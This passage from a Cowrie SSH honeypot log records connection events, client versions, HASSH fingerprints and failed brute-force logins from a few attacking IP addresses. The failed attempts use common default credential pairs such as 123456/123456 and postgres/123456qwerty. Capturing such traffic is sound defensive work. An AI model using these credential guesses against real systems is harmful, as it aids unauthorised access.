,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:51:33.025064Z","src_ip":"212.227.235.229","session":"07bc4eb5b5e2"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:51:34.172894Z","src_ip":"212.227.235.229","session":"2fc2fa45bada"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:51:34.173977Z","src_ip":"212.227.235.229","session":"2fc2fa45bada"}
{"eventid":"cowrie.login.failed","username":"auto","password":"lifesize","message":"login attempt [auto/lifesize] failed","sensor":"my-vps","timestamp":"2025-08-31T04:51:34.565089Z","src_ip":"212.227.235.229","session":"07bc4eb5b5e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54198,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ea927a9ea81","protocol":"ssh","message":"New connection: 212.227.235.229:54198 (1.2.3.4:22) [session: 7ea927a9ea81]","sensor":"my-vps","timestamp":"2025-08-31T04:51:35.867257Z"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:51:36.097969Z","src_ip":"212.227.235.229","session":"07bc4eb5b5e2"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:51:36.451373Z","src_ip":"212.227.235.229","session":"7ea927a9ea81"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:51:36.566468Z","src_ip":"212.227.235.229","session":"7ea927a9ea81"}
{"eventid":"cowrie.login.failed","username":"123456","password":"123456","message":"login attempt [123456/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:51:37.546370Z","src_ip":"212.227.235.229","session":"7ea927a9ea81"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:51:39.088900Z","src_ip":"212.227.235.229","session":"7ea927a9ea81"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34446,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa7e7b295ab5","protocol":"ssh","message":"New connection: 212.227.235.229:34446 (1.2.3.4:22) [session: fa7e7b295ab5]","sensor":"my-vps","timestamp":"2025-08-31T04:51:40.227901Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:51:40.229457Z","src_ip":"212.227.235.229","session":"fa7e7b295ab5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51674,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ddc0ac5761f","protocol":"ssh","message":"New connection: 212.227.125.160:51674 (1.2.3.4:22) [session: 7ddc0ac5761f]","sensor":"my-vps","timestamp":"2025-08-31T04:51:40.247926Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:51:40.248842Z","src_ip":"212.227.125.160","session":"7ddc0ac5761f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:51:40.355196Z","src_ip":"212.227.235.229","session":"fa7e7b295ab5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:51:40.437616Z","src_ip":"212.227.125.160","session":"7ddc0ac5761f"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123456qwerty","message":"login attempt [postgres/123456qwerty] failed","sensor":"my-vps","timestamp":"2025-08-31T04:51:40.899639Z","src_ip":"212.227.235.229","session":"fa7e7b295ab5"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev123456","message":"login attempt [dev/dev123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:51:41.007222Z","src_ip":"212.227.125.160","session":"7ddc0ac5761f"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:51:42.026299Z","src_ip":"212.227.235.229","session":"fa7e7b295ab5"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:51:42.197638Z","src_ip":"212.227.125.160","session":"7ddc0ac5761f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45030,"dst_ip":"1.2.3.4","dst_port":22,"session":"f146760e4d32","protocol":"ssh","message":"New connection: 212.227.235.229:45030 (1.2.3.4:22) [session: f146760e4d32]","sensor":"my-vps","timestamp":"2025-08-31T04:51:42.479734Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:51:43.563481Z","src_ip":"212.227.235.229","session":"f146760e4d32"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:51:43.970540Z","src_ip":"212.227.235.229","session":"f146760e4d32"}
{"eventid":"cowrie.login.failed","username":"user100","password":"user100","message":"login attempt [user100/user100] failed","sensor":"my-vps","timestamp":"2025-08-31T04:51:45.754306Z","src_ip":"212.227.235.229","session":"f146760e4d32"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40126,"dst_ip":"1.2.3.4","dst_port":22,"session":"84270d7546d7","protocol":"ssh","message":"New connection: 212.227.235.229:40126 (1.2.3.4:22) [session: 84270d7546d7]","sensor":"my-vps","timestamp":"2025-08-31T04:51:48.025192Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:51:48.081923Z","src_ip":"212.227.235.229","session":"84270d7546d7"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:51:48.110306Z","src_ip":"212.227.235.229","session":"f146760e4d32"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45038,"dst_ip":"1.2.3.4","dst_port":22,"session":"c10e4adeab14","protocol":"ssh","message":"New connection: 212.227.235.229:45038 (1.2.3.4:22) [session: c10e4adeab14]","sensor":"my-vps","timestamp":"2025-08-31T04:51:48.263234Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:51:48.265755Z","src_ip":"212.227.235.229","session":"c10e4adeab14"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:51:48.300405Z","src_ip":"212.227.235.229","session":"84270d7546d7"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:51:48.517084Z","src_ip":"212.227.235.229","session":"c10e4adeab14"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59102,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd84ff396d28","protocol":"ssh","message":"New connection: 212.227.235.229:59102 (1.2.3.4:22) [session: fd84ff396d28]","sensor":"my-vps","timestamp":"2025-08-31T04:51:50.237852Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:51:50.239058Z","src_ip":"212.227.235.229","session":"fd84ff396d28"}
